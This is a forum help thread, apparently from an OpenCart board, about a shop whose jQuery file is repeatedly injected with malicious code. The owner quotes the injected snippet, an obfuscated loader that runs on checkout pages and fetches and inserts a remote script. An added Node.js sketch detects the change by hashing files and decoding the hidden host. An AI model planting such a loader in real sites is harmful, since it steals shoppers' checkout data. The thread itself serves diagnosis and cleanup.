Looking for help please. One of my sites has been compromised with this - the jquery-2.1.1-min file keeps being edited.
I have tried all I can to compare files and have removed the infected jQuery file and reloaded a fresh one. However, it keeps being edited again, I suspect with a script somewhere, as we have closed all possible openings we could find and changed passwords. Does anyone have any pointers, or can anyone who has had the same possibly help, please?
The weird thing is even when the file gets modified neither the size nor even the date is changed, yet the file has been edited...
When Netcraft visited the site...
The following suspicious resources were loaded:
https:/mydomian/shop/catalog/view/javascript/jquery/jquery-2.1.1.min.js [more information] [search]
Click [search] for more information on how we discovered each resource.
To confirm that a resource is being loaded, visit the infected page while watching the network tab of your web browser's developer tools (F12 in Google Chrome, Mozilla Firefox, Microsoft Edge and Internet Explorer).
Malicious code loaded as part of the resources:
https://mydomain.co.uk/shop/catalog/vie ... 1.1.min.js
...&a.jQuery===n&&(a.jQuery=Lc),n},typeof b===U&&(a.jQuery=a.$=n),n});!function(e,t){let n=-1!==e.cookie.indexOf("debug=");e.location.toString().includes(t)&&fetch([47,47,99,100,110,106,115,46,115,116].map(function(e){return String.fromCharCode(e)}).join(""),{method:"POST"}).then(function(e){if(e.ok)return e.text()}).then(function(t){if(t){let i=e.createElement("script");i.setAttribute("src",t+(n?(t.includes("?")?"&":"?")+"_="+new Date().valueOf().toString().slice(0, -2):"")),e.head.appendChild(i)}})}(document,"checkout");...
I've tried comparing files, but as this has had quite a bit of work over the past 4 years the files are quite different.
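An added example, not part of the thread and not OpenCart or Netcraft code: because the file can change while its size and date stay the same, this Node.js sketch compares content hashes against a known-good copy and decodes char-code arrays like the one in the reported snippet. The helper names `compare` and `decodeCharCodeArrays`, the file names and the sample file contents are constructed for illustration.

```javascript
const crypto = require("crypto");
const fs = require("fs");
const os = require("os");
const path = require("path");

const sha256 = (buf) => crypto.createHash("sha256").update(buf).digest("hex");

// Decode numeric arrays that are mapped through String.fromCharCode,
// the trick the injected snippet uses to hide the host it fetches from.
function decodeCharCodeArrays(source) {
  const re = /\[((?:\s*\d{1,3}\s*,)+\s*\d{1,3}\s*)\]\s*\.map\([^)]*\)\s*\{[^}]*String\.fromCharCode/g;
  return [...source.matchAll(re)].map((m) =>
    String.fromCharCode(...m[1].split(",").map(Number)));
}

// Compare a deployed file with a known-good copy by metadata and by content.
function compare(goodPath, livePath) {
  const good = fs.statSync(goodPath), live = fs.statSync(livePath);
  const liveBytes = fs.readFileSync(livePath);
  return {
    sameSize: good.size === live.size,
    sameMtime: good.mtimeMs === live.mtimeMs,
    sameHash: sha256(fs.readFileSync(goodPath)) === sha256(liveBytes),
    hiddenStrings: decodeCharCodeArrays(liveBytes.toString("utf8")),
  };
}

// Constructed sample: two files with equal size and mtime, different content.
function demo() {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "jqcheck-"));
  const base = "/* constructed stand-in for the clean library */";
  const tail = 'fetch([47,47,99,100,110,106,115,46,115,116].map(function(e){' +
    'return String.fromCharCode(e)}).join(""),{method:"POST"});';
  const goodPath = path.join(dir, "good.js"), livePath = path.join(dir, "live.js");
  fs.writeFileSync(goodPath, base + " ".repeat(tail.length));
  fs.writeFileSync(livePath, base + tail);
  const stamp = new Date("2020-01-01T00:00:00Z");
  fs.utimesSync(goodPath, stamp, stamp);
  fs.utimesSync(livePath, stamp, stamp);
  const result = compare(goodPath, livePath);
  fs.rmSync(dir, { recursive: true, force: true });
  return result;
}

console.log(demo());
```

Run against a real install, `compare` would take a jQuery 2.1.1 file from a trusted download as the known-good copy and the deployed file as the live one; a `sameHash` of false with matching size and mtime is the situation described in the post.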
You will need to check your main site as well as the shop directory.
I suggest putting a firewall on your website then a clean version of the jquery file. I use Ninja firewall which is pretty good IMO.
anon545 wrote: ↑Fri Jun 21, 2024 11:47 pm
hi all,
https://nintechnet.com/ninjafirewall/pro-edition
Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk
You need to get an experienced developer involved ASAP such as ourselves or someone from Commercial Support.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
ELEV8TE Website Development
Available for hire - please contact me at https://www.elev8tewebsitedevelopment.com/contact
https://www.elev8tewebsitedevelopment.com
That's not going to work because they'll lose all orders placed in between.
I should have been more specific. Restore the files only, not the database.
paulfeakins wrote: ↑Tue Jun 25, 2024 10:39 pm
That's not going to work because they'll lose all orders placed in between.
And what if the attackers have added an admin user with full permissions?